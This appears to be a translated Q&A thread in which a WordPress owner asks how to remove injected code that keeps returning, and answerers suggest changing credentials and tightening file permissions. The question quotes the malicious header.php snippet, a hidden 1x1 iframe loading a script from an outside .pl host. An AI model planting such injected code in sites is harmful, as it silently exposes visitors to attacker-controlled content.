1

私の (Wordpress) Web サイトがハッキングされたようで、メインの index.php ファイル、テーマの index.php ファイル、テーマの header.php ファイルにコードが追加されています。

この部分は header.php から来ています

#f524d6#
<script type=\"text/javascript\" language=\"javascript\" >
(function () {    var kilun = document.createElement('iframe');    kilun.src = 'http://hosting3081247.az.pl/cgi-bin/counter.php';    kilun.style.position = 'absolute';    kilun.style.border = '0';    kilun.style.height = '1px';    kilun.style.width = '1px';    kilun.style.left = '1px';    kilun.style.top = '1px';    if (!document.getElementById('kilun')) {        document.write('<div id=\'kilun\'></div>');        document.getElementById('kilun').appendChild(kilun);    }})();</script>";
#/f524d6#

誰かがこれを削除する方法を教えてもらえますか? コード行を削除した後に戻ります。

4

2 に答える 2

1

wordpress 内だけでなく、通常の html/php ページでこれを見つけた場合は、おそらくサーバー上のすべてのファイルを解析するスクリプト (つまり wp ハックではない) であり、その場合はサーバーのユーザー名とパスワードを変更することをお勧めします (同様に)。 wordpress の場合): ftp、shell など。

于 2012-12-13T11:28:44.363 に答える
-1
  • 最小限のアクセス許可でフォルダーとファイルを変更します。
  • あなたのを守ります.htaccess
  • フォルダの所有権を確認します。
  • すべてのパスワードを変更し、より難しいパスワードを作成してください。
于 2012-12-13T11:26:48.237 に答える